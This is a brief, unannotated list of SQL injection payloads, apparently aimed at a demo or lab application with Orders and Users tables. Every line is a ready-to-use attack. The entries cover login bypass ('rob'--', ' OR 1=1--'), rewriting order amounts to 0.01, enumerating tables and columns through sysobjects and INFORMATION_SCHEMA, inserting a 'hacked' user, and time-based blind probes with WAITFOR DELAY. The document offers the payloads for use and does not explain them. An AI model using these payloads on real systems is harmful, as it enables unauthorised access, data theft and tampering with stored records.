known user
rob'--

unkonwn user
' OR 1=1--

update
';UPDATE Orders Set Amount='0.01'-- 

tables
' OR 1=1; INSERT INTO ORDERS (userid, amount, creditcard) SELECT 3, name, CAST(id AS VARCHAR(10)) FROM sysobjects WHERE xtype ='U' --

columns
' OR 1=1; INSERT INTO ORDERS (userid, amount, creditcard) SELECT 3, COLUMN_NAME, DATA_TYPE FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'users'-- 

add user
';INSERT INTO Users SELECT 'hacked','hacked'-- 

blind techniques
';if exists(select * from Users where UserName = 'root') waitfor delay '0:0:5'--
';if exists(select * from Users where UserName = 'admin') waitfor delay '0:0:5'--